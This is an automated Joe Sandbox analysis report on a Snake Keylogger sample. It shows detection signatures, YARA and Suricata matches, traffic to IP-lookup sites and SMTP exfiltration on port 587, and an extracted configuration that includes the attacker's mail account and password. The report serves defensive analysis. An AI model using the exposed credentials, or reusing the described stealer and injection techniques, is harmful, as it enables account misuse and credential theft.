Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rp8s2rxD5lpuQAG.exe

Overview

General Information

Sample name:rp8s2rxD5lpuQAG.exe
Analysis ID:1540254
MD5:43299ecabd7a0636e5755414d6b7dc0c
SHA1:488e54f43753706c1ea4e9ba9adffcac501ca086
SHA256:21a47b89b543c1b97adba1999aba18a149cf9e96e00bdabe70f929ba1a8b424e
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rp8s2rxD5lpuQAG.exe (PID: 3688 cmdline: "C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe" MD5: 43299ECABD7A0636E5755414D6B7DC0C)
    • rp8s2rxD5lpuQAG.exe (PID: 4304 cmdline: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe MD5: 43299ECABD7A0636E5755414D6B7DC0C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "montesinos@azvconsulting.com", "Password": "FxPtU9s5", "Host": "azvconsulting.com", "Port": "587", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x14728:$a1: get_encryptedPassword
      • 0x14a14:$a2: get_encryptedUsername
      • 0x14534:$a3: get_timePasswordChanged
      • 0x1462f:$a4: get_passwordField
      • 0x1473e:$a5: set_encryptedPassword
      • 0x15d61:$a7: get_logins
      • 0x15cc4:$a10: KeyLoggerEventArgs
      • 0x15940:$a11: KeyLoggerEventArgsEventHandler
      00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x17fcc:$x1: $%SMTPDV$
      • 0x18032:$x2: $#TheHashHere%&
      • 0x19695:$x3: %FTPDV$
      • 0x19789:$x4: $%TelegramDv$
      • 0x15940:$x5: KeyLoggerEventArgs
      • 0x15cc4:$x5: KeyLoggerEventArgs
      • 0x196b9:$m2: Clipboard Logs ID
      • 0x198d9:$m2: Screenshot Logs ID
      • 0x199e9:$m2: keystroke Logs ID
      • 0x19cc3:$m3: SnakePW
      • 0x198b1:$m4: \SnakeKeylogger\
      00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 22 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x12b28:$a1: get_encryptedPassword
            • 0x12e14:$a2: get_encryptedUsername
            • 0x12934:$a3: get_timePasswordChanged
            • 0x12a2f:$a4: get_passwordField
            • 0x12b3e:$a5: set_encryptedPassword
            • 0x14161:$a7: get_logins
            • 0x140c4:$a10: KeyLoggerEventArgs
            • 0x13d40:$a11: KeyLoggerEventArgsEventHandler
            0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x1a4bd:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x196ef:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x19b22:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1ab61:$a5: \Kometa\User Data\Default\Login Data
            0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x136c4:$s1: UnHook
            • 0x136cb:$s2: SetHook
            • 0x136d3:$s3: CallNextHook
            • 0x136e0:$s4: _hook
            Click to see the 24 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Outbound SMTP Connections
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.14.58.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe, Initiated: true, ProcessId: 4304, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49741

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-23T16:01:36.356933+020028033053Unknown Traffic192.168.2.549709188.114.97.3443TCP
            2024-10-23T16:01:42.411660+020028033053Unknown Traffic192.168.2.549719188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-23T16:01:34.492664+020028032742Potentially Bad Traffic192.168.2.549706193.122.130.080TCP
            2024-10-23T16:01:35.633309+020028032742Potentially Bad Traffic192.168.2.549706193.122.130.080TCP
            2024-10-23T16:01:37.086424+020028032742Potentially Bad Traffic192.168.2.549710193.122.130.080TCP
            2024-10-23T16:01:38.555166+020028032742Potentially Bad Traffic192.168.2.549713193.122.130.080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: rp8s2rxD5lpuQAG.exeAvira: detected
            Found malware configuration
            Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "montesinos@azvconsulting.com", "Password": "FxPtU9s5", "Host": "azvconsulting.com", "Port": "587", "Version": "5.1"}
            Multi AV Scanner detection for submitted file
            Source: rp8s2rxD5lpuQAG.exeReversingLabs: Detection: 55%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.0
            Source: rp8s2rxD5lpuQAG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: laoA.pdb source: rp8s2rxD5lpuQAG.exe
            Source: Binary string: laoA.pdbSHA256Bi source: rp8s2rxD5lpuQAG.exe
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 4x nop then dec eax0_2_00007FF848F4388C
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 4x nop then jmp 00007FF848F3A1EDh3_2_00007FF848F39ED2
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 4x nop then jmp 00007FF848F37FA4h3_2_00007FF848F37D92
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 4x nop then jmp 00007FF848F3A7E0h3_2_00007FF848F3A46C
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 4x nop then jmp 00007FF848F37BE9h3_2_00007FF848F37089
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 4x nop then jmp 00007FF848F38E2Dh3_2_00007FF848F38AFE
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 4x nop then jmp 00007FF848F39CFDh3_2_00007FF848F39A08
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 4x nop then jmp 00007FF848F389E5h3_2_00007FF848F3821F
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 4x nop then jmp 00007FF848F3931Dh3_2_00007FF848F3902A
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 4x nop then jmp 00007FF848F3980Dh3_2_00007FF848F394F2
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 4x nop then jmp 00007FF848F3A7E0h3_2_00007FF848F3A6FC
            Source: global trafficTCP traffic: 192.168.2.5:49741 -> 185.14.58.143:587
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: S4N-ASES S4N-ASES
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49713 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.5:49741 -> 185.14.58.143:587
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: azvconsulting.com
            Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://azvconsulting.com
            Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C2D000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C62000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C06000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C2D000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C62000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B9C000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C06000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.90
            Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.90p
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 3688, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 3688, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 4304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 4304, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 0_2_00007FF848F416B80_2_00007FF848F416B8
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 0_2_00007FF848F4EED70_2_00007FF848F4EED7
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 0_2_00007FF848F47D9A0_2_00007FF848F47D9A
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 3_2_00007FF848F370893_2_00007FF848F37089
            Source: rp8s2rxD5lpuQAG.exeStatic PE information: No import functions for PE file found
